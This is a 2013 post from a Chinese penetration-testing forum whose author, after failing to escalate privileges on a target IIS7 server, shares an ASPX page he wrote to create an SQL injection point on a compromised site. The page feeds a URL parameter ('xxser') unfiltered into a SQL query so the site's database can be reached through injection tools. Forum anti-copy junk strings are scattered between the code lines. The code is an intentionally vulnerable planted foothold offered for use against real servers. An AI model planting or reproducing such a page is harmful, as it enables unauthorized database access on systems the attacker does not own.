中国网络渗透测试联盟
标题:
利用aspx构造注射来跨站
[打印本页]
作者:
admin
时间:
2013-3-20 21:32
标题:
利用aspx构造注射来跨站
昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。
; n1 z! Q% G1 s1 U+ p- e
其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。
9 F' M' F. r! w4 X" K" e
代码量不多,自己写个拉倒了。烦死了。
% g' Q7 |$ w6 ]% y/ u( ?- C
5 s1 O4 a4 M1 N% x6 {
$ G3 ~6 i0 M; L N
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1 i C4 X. V, Z" y* i
<html xmlns="http://www.w3.org/1999/xhtml">
3 E) h8 k7 J4 G0 {/ c- I) N6 I
<head runat="server">
+ `* |* P$ |2 e% W- y
<title>暗影aspx构造注射专用页面</title>
" o7 L; V! C, v
</head>
0 s1 P; w6 J* [1 @/ v
<body>
# D d7 ?* ]8 f
<form id="form1" runat="server">
, h: X, c5 X( S$ m+ U5 s
<div>
$ D- G4 C' k" [( p0 B! i' l
<script language="c#" runat="server">
" B$ b/ {" T9 q- ^% [
+ G# v; b7 r3 { e* \; G# s
void page_init(object sender, EventArgs e)
+ p1 w$ G0 Q0 I% {, j1 q
{
0 l. q+ N' S; c% r; |3 M- z* a
' W1 F7 C0 I- R
System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
: A$ d% M& G. \9 T
1 g4 ^) D% M; T6 ]4 s6 N7 M" J
conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
) J& c; b9 G( _! n7 Z E
conn.Open();
1 f' H9 |+ ?" F* b$ e
4 ]8 g) D' R( |# N1 G" l8 }* R8 d/ p$ \
string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1
7 }' E$ @0 b& e, G; X
# a9 Y! s7 n, H" v* Z2 i
System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
9 n( S) A/ s5 ^, f- E% _
int x = command.ExecuteNonQuery();
1 Q4 C g# G& V- p7 k0 p% m' h
Response.Write(i+"\n");
# N- }% `* }; z
Response.Write(x);
3 Q4 G! E# W9 ^" T- P
conn.Close();
. ~ K! k" h& i" z# C$ g
}
/ w/ j |0 O1 E4 l& w
% Z; c5 C$ f4 O) R
</script>
% `! ^ l$ V# ~" {. D% Y1 C" t8 L; j
</div>
5 y" Z! s% e+ T. o6 R6 C+ J8 l% c
</form>
# f& P& W- ^" V! @) c+ `, i/ H
</body>
7 v% P$ i( I+ Q! D# R7 P
</html>
: {& w ?5 q# J, T% _
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2